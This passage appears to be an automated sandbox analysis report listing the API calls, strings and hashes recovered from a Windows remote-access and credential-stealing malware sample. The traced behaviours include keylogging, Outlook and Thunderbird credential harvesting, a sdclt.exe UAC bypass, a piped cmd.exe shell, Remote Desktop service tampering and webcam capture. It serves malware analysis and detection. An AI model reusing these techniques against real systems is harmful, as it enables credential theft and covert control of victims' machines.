                                                • Instruction Fuzzy Hash: BE7185706001147BDB14BF62DC5AEEE7B68BF98318B00443EF519B61D1DF7CAA05CA58
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 004095BC
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 0040962B
                                                • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00409645
                                                • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00409651
                                                • lstrcpyW.KERNEL32(?,-00000010), ref: 0040968B
                                                • lstrcatW.KERNEL32(?,00414A58), ref: 0040969E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040FF27: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0040FF54
                                                • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00409721
                                                • wsprintfW.USER32 ref: 00409758
                                                • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 0040979A
                                                • CloseHandle.KERNEL32(00000000), ref: 004097AA
                                                • RegisterClassW.USER32 ref: 004097C9
                                                • CreateWindowExW.USER32 ref: 004097E1
                                                • GetMessageA.USER32 ref: 00409802
                                                • TranslateMessage.USER32(?), ref: 00409814
                                                • DispatchMessageA.USER32(?), ref: 0040981F
                                                • GetMessageA.USER32 ref: 0040982F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                                • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                • API String ID: 2678186124-2372768292
                                                • Opcode ID: df6117677810be282a3d8ac22bece896e1c62fdd803549dfb87a757c95bc9f23
                                                • Instruction ID: 39917dbe05b92edb34d852007e222ad395107d7940ebd828c0aa0b94b9005c6a
                                                • Opcode Fuzzy Hash: df6117677810be282a3d8ac22bece896e1c62fdd803549dfb87a757c95bc9f23
                                                • Instruction Fuzzy Hash: B0718CB2504304ABC710DFA5DC49EAB77ECFB89704F00892EF589E6291DA39D944CB69
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A12F
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A14C
                                                • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 0040A19F
                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A1B5
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040A1E8
                                                • RegCloseKey.ADVAPI32(?), ref: 0040A1F9
                                                • lstrcpyW.KERNEL32(?,?), ref: 0040A20D
                                                • lstrcatW.KERNEL32(?,00414684), ref: 0040A21B
                                                • lstrcatW.KERNEL32(?,?), ref: 0040A22F
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A24C
                                                • RegCloseKey.ADVAPI32(?), ref: 0040A261
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A27E
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A142, 0040A152
                                                • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A17C, 0040A181, 0040A191
                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A15F, 0040A16F
                                                • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A125
                                                • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A135
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                • API String ID: 1891545080-2020977430
                                                • Opcode ID: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
                                                • Instruction ID: 3b09ce140b779f32128b2b507774cdcec2852ce8a85b0d369bf0fcab4c4bb44c
                                                • Opcode Fuzzy Hash: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
                                                • Instruction Fuzzy Hash: C3419DB290021DFEEB21DAA1DC44EFF777CEB04784F1004BAB605F2141E6789E909BA5
                                                APIs
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                • CloseHandle.KERNEL32(?), ref: 00411AD8
                                                • GetCurrentProcess.KERNEL32(?), ref: 00411AE7
                                                • IsWow64Process.KERNEL32(00000000), ref: 00411AEE
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 00411B25
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00411B57
                                                • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 00411B69
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B81
                                                • ShellExecuteExW.SHELL32(?), ref: 00411BB3
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411BBD
                                                • Sleep.KERNEL32(000007D0), ref: 00411BD5
                                                • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00411BE5
                                                • ExitProcess.KERNEL32 ref: 00411BEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                                • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                • API String ID: 3164795406-2081737068
                                                • Opcode ID: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
                                                • Instruction ID: 72994b68b8d2737cdcda42cc23d7f68f865ca3c4a3f3ee0d868a1c5545f4d225
                                                • Opcode Fuzzy Hash: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
                                                • Instruction Fuzzy Hash: 75317EB1C01118BBDB10ABA1DC48EDEBB7CEF85315F1080B6FA09A2160D7385A85CB68
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00408E8F
                                                • GetWindowTextW.USER32(00000000,?,00000104,?,?), ref: 00408EA2
                                                • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
                                                • lstrcpyW.KERNEL32(-00000210,?), ref: 00408F58
                                                • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00408F79
                                                • lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
                                                • WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE
                                                • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408FD2
                                                • lstrlenW.KERNEL32(00414AD0,-00000008,00000000,?,?), ref: 00408FE5
                                                • WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FF1
                                                • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00409003
                                                • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00409011
                                                • CloseHandle.KERNEL32(?), ref: 0040901B
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                                • String ID: {Unknown}
                                                • API String ID: 2314120260-4054869793
                                                • Opcode ID: 992d3a07b905f4852690db995bdfd4e03bd76e4fd33253bb5948540b72395d4a
                                                • Instruction ID: 48c8d0e1ccd5ade84659c98120638cea8da37cb0c086f8587c48bb6223624dfa
                                                • Opcode Fuzzy Hash: 992d3a07b905f4852690db995bdfd4e03bd76e4fd33253bb5948540b72395d4a
                                                • Instruction Fuzzy Hash: B4519271A00104AFDB00EF65DC99FDA7BA8EF44344F0580B9F509A72A1DB75AE50CB68
                                                APIs
                                                  • Part of subcall function 0040EA89: GetCurrentThreadId.KERNEL32(?,00000000,00402A8C,00000000,exit,00000000,start), ref: 0040EA95
                                                  • Part of subcall function 0040EA89: SetEvent.KERNEL32(00000000), ref: 0040EAA9
                                                  • Part of subcall function 0040EA89: WaitForSingleObject.KERNEL32(0041956C,00001388), ref: 0040EAB6
                                                  • Part of subcall function 0040EA89: TerminateThread.KERNEL32(0041956C,000000FE), ref: 0040EAC7
                                                • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0040EB41
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0040EB5E
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EB64
                                                • DuplicateHandle.KERNEL32 ref: 0040EB6D
                                                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0040EB85
                                                • GetCurrentProcess.KERNEL32(00419560,00000000,00000000,00000002,?,00000000), ref: 0040EB9E
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBA4
                                                • DuplicateHandle.KERNEL32 ref: 0040EBA7
                                                • GetCurrentProcess.KERNEL32(00419564,00000000,00000000,00000002,?,00000000), ref: 0040EBBC
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBC2
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040EC18
                                                • CreateThread.KERNEL32(00000000,00000000,0040E92A,00419558,00000000,00419570), ref: 0040EC38
                                                • DuplicateHandle.KERNEL32 ref: 0040EBC5
                                                  • Part of subcall function 0040EC8C: CloseHandle.KERNEL32(00419568), ref: 0040EC96
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040E891: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040E8E3
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                • String ID:
                                                • API String ID: 337272696-0
                                                • Opcode ID: 17de9e7c98fe341788f9595ed085310b6ea3ebf193b3da8da13d74dd34396210
                                                • Instruction ID: 133df40998d99ecd2617a4aa81dd542fac3e70f3ef78a3e4fdcb16f339e728fe
                                                • Opcode Fuzzy Hash: 17de9e7c98fe341788f9595ed085310b6ea3ebf193b3da8da13d74dd34396210
                                                • Instruction Fuzzy Hash: 5A418471900209BAFB14EBA2CE56FEFBB78AF44745F10443BF501B20D1DB789A15CA69
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D5A0
                                                • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D5B9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D5C6
                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D5D5
                                                • GetLastError.KERNEL32 ref: 0040D5DF
                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D600
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D611
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D614
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D624
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D627
                                                  • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
                                                  • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                • String ID: ServicesActive
                                                • API String ID: 1929760286-3071072050
                                                • Opcode ID: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
                                                • Instruction ID: ebb33121c736b37e022c412f83ca8b13b1641e7c3b3b3a4d2b3b8dbfd97acc73
                                                • Opcode Fuzzy Hash: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
                                                • Instruction Fuzzy Hash: 6D119D71900218BBCB109BA2DD48D9F7FADEFC97547114036FA06E3290DB389E01CBA8
                                                APIs
                                                • EnterCriticalSection.KERNEL32 ref: 0040DEEF
                                                  • Part of subcall function 0040FC58: GetCurrentProcess.KERNEL32(?,?,00402D84,?,00414648,?,?,00000000,?,?,?), ref: 0040FC5C
                                                • PathFileExistsW.SHLWAPI(?), ref: 0040E099
                                                • PathFileExistsW.SHLWAPI(?), ref: 0040DF0D
                                                  • Part of subcall function 0040FDF0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0040FE07
                                                  • Part of subcall function 0040FDF0: GetLastError.KERNEL32(?,?,?,00409A69,?,?,?), ref: 0040FE15
                                                • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E28C
                                                  • Part of subcall function 0040D9B6: RegOpenKeyExW.ADVAPI32 ref: 0040D9EA
                                                • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E17F
                                                • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E2CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 1717069549-2896544425
                                                • Opcode ID: e7ba69e5c4d358e8994fdac3496a4f24137894f42445f22d23cd093ec350b375
                                                • Instruction ID: 6d1121f80526272389c26c227ec0b40347df9dac2dac69921326d16d34c53ede
                                                • Opcode Fuzzy Hash: e7ba69e5c4d358e8994fdac3496a4f24137894f42445f22d23cd093ec350b375
                                                • Instruction Fuzzy Hash: 58B14D71508205ABC714EF62CC91DABB7A8BF94348F00093FB552A31D1DB78EA59CB5A
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DCF3
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DD57
                                                • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DD65
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DD82
                                                Strings
                                                • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DCBE
                                                • ImagePath, xrefs: 0040DD05
                                                • svchost.exe -k, xrefs: 0040DD5D
                                                • ServiceDll, xrefs: 0040DD90
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCE
                                                • svchost.exe, xrefs: 0040DD4F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                                • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                • API String ID: 2246401353-3333427388
                                                • Opcode ID: 3c46e40b44c7150c4bb0a6584e962ef9b7730d40a0ca3a549d9ff2b1885c363a
                                                • Instruction ID: b0e3efee02fd3b5bcb605f8d25d9eb9ad0325da8f8f16e1407df865518f0ff08
                                                • Opcode Fuzzy Hash: 3c46e40b44c7150c4bb0a6584e962ef9b7730d40a0ca3a549d9ff2b1885c363a
                                                • Instruction Fuzzy Hash: 6F410C71D00118ABDF14EBE2CD52EEEB738AF14745F10406BA401B21D1EB78AB45CAA8
                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409AFC
                                                • GetLastError.KERNEL32 ref: 00409B09
                                                • CloseHandle.KERNEL32(00000000), ref: 00409B10
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409B1D
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409B4C
                                                • CloseHandle.KERNEL32(00000000), ref: 00409B53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                • String ID: Password$Password
                                                • API String ID: 1366138817-7788977
                                                • Opcode ID: a83f1898175cc25c3bc8a3f1448733481d8638435ddeddde8ca691726911fd77
                                                • Instruction ID: 104b88514deac065fe8cd1f3a748688661c759891a47cef897251ecb07377383
                                                • Opcode Fuzzy Hash: a83f1898175cc25c3bc8a3f1448733481d8638435ddeddde8ca691726911fd77
                                                • Instruction Fuzzy Hash: 2281E070C082456EFF259BA8D845AAF7FA5AF41318F10807FE4417A2D3CB7D1E428B59
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0041274C
                                                • CoCreateInstance.OLE32(004145A0,00000000,00000001,00417410,{"A), ref: 00412779
                                                • CoUninitialize.OLE32 ref: 00412902
                                                  • Part of subcall function 00412A6B: CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 00412A99
                                                • CoCreateInstance.OLE32(004145F0,00000000,00000001,00417400,?), ref: 004127CA
                                                  • Part of subcall function 004124EB: CoTaskMemFree.OLE32(?), ref: 004124F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                • String ID: Grabber$Source$vids${"A
                                                • API String ID: 533512943-829088075
                                                • Opcode ID: b8c9bf1896b8d674ab3dbeb163a760aa6cf87fb7c74c69ea63af9a5f96d6631b
                                                • Instruction ID: f60cba08d0f00ca84645215000878ed329aa95aec1bd6b6a09df8212b68bd471
                                                • Opcode Fuzzy Hash: b8c9bf1896b8d674ab3dbeb163a760aa6cf87fb7c74c69ea63af9a5f96d6631b
                                                • Instruction Fuzzy Hash: 3E516D71A00209AFDB14DFA5C888EEEB7B9EF84304F14856EE905EB250CBB59D41CB64
                                                APIs
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
                                                • CoInitialize.OLE32(00000000), ref: 0040F82C
                                                • CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?), ref: 0040F84A
                                                • VariantInit.OLEAUT32(?), ref: 0040F8CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                • String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                • API String ID: 2382742315-3227336550
                                                • Opcode ID: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
                                                • Instruction ID: 3360bb0e2bdd619f1c1acbb00a5b578425b81bf7c01421450e144227b1317e44
                                                • Opcode Fuzzy Hash: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
                                                • Instruction Fuzzy Hash: 42410875A00209ABCB14DB95CC48EDFBBB8EFC9B04B1484B9F515EB290D774A946CB24
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,00000000,770113FB,00000000), ref: 00411F25
                                                • IsWow64Process.KERNEL32(00000000), ref: 00411F2C
                                                • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00411F50
                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00411F5E
                                                • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00411F6C
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00411FA9
                                                • Sleep.KERNEL32(000003E8), ref: 00411FB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 3151064845-2003734499
                                                • Opcode ID: 559f2bd097435d8a568bcf13c594c8383120a3eb8e261063f6a0de6b71a55955
                                                • Instruction ID: cb044ac8fdf5ef6581503e12c37282ac8c42e3dcda270f9c1544013f8f079b25
                                                • Opcode Fuzzy Hash: 559f2bd097435d8a568bcf13c594c8383120a3eb8e261063f6a0de6b71a55955
                                                • Instruction Fuzzy Hash: 261184F1A00208BFEB10A7B6EC49FEF766CDB44745F104036F705E61A0DA749E458669
                                                APIs
                                                • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                • lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040C17B
                                                • RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                • RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                Strings
                                                • Path, xrefs: 0040C190
                                                • thunderbird.exe, xrefs: 0040C15A
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040C14E
                                                Similarity
                                                • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                APIs
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5A5
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5AF
                                                • CopyFileW.KERNEL32 ref: 0040C5C3
                                                • CopyFileW.KERNEL32 ref: 0040C5CF
                                                  • Part of subcall function 0040CED9: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF43
                                                  • Part of subcall function 0040CED9: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF4C
                                                  • Part of subcall function 0040CF58: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040CFE0
                                                  • Part of subcall function 0040CF58: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040D00E
                                                  • Part of subcall function 0040CF58: LocalFree.KERNEL32(?), ref: 0040D096
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
                                                  • Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000,?,00000000), ref: 00403093
                                                Similarity
